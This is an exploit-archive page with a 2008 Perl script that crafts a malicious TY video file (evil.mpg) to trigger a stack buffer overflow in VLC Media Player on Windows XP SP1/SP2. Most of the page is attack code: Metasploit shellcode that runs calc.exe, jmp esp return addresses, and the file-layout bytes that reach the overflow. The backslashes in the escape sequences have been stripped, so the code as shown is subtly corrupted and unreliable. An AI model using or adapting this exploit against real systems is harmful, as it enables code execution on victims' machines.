[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : VLC Media Player TY File Stack Based Buffer Overflow Exploit
# Published : 2008-10-21
# Author : Guido Landi
# Previous Title : Total Video Player 1.20 M3U File Local Stack Buffer Overflow Exploit
# Next Title : BitTorrent 6.0.3 .torrent File Stack Buffer Overflow Exploit
#!/usr/bin/perl
# 10/21/2008 k`sOSe
use warnings;
use strict;
# windows/exec - 141 bytes
# http://www.metasploit.com
my $shellcode =
"xfcxe8x44x00x00x00x8bx45x3cx8bx7cx05x78x01" .
"xefx8bx4fx18x8bx5fx20x01xebx49x8bx34x8bx01" .
"xeex31xc0x99xacx84xc0x74x07xc1xcax0dx01xc2" .
"xebxf4x3bx54x24x04x75xe5x8bx5fx24x01xebx66" .
"x8bx0cx4bx8bx5fx1cx01xebx8bx1cx8bx01xebx89" .
"x5cx24x04xc3x5fx31xf6x60x56x64x8bx46x30x8b" .
"x40x0cx8bx70x1cxadx8bx68x08x89xf8x83xc0x6a" .
"x50x68xf0x8ax04x5fx68x98xfex8ax0ex57xffxe7" .
"x43x3ax5cx57x49x4ex44x4fx57x53x5cx73x79x73" .
"x74x65x6dx33x32x5cx63x61x6cx63x2ex65x78x65" .
"x00";
usage() if(!defined(@ARGV) or scalar(@ARGV) < 1 or $ARGV[0] !~ /^d$/ or $ARGV[0] > 1);
my @targets = (
"x24x11x62x77", # jmp esp @ shell32.dll - Win XP SP1
"xb3x57x04x7d" # jmp esp @ shell32.dll - Win XP SP2
);
my $junk = "x41";
open(my $file, "> evil.mpg");
print $file "xF5x46x7AxBD" . # TIVO_PES_FILEID
"x00x00x00x02" .
"x00x02x00x00" . # CHUNK_SIZE
$junk x 8 .
"x00x00x05x41" . # i_map_size
$junk x 4 .
"x00x00x05x49" . # SEQ table size / (i_map_size + 8) == 1
$junk x 60 .
$targets[$ARGV[0]] .
$shellcode .
$junk x 130835 .
"x05" . # i_num_recs
$junk x 3 .
"x05" . # p_hdrs
$junk x 1 .
"x09" . # subrec_type
# (subrec type & 0x0f) << 8 | rec_type == 0x9c0 -> AC-3 Audio (DTivo)
"xc0" . # rec_type /
$junk x 14 .
"x06" . # subrec_type
# (subrec type & 0x0f) << 8 | rec_type == 0x6e0 -> Series 1 Tivo
"xe0" . # rec_type /
$junk x 531062;
sub usage
{
print <<EOM;
VLC Media Player TY File Stack Based Buffer Overflow Exploit
k`sOSe - 10/21/2008
usage:
$0 <target>
targets:
0 - Windows XP SP1
1 - Windows XP SP2
EOM
exit;
}
# www.Syue.com [2008-10-21]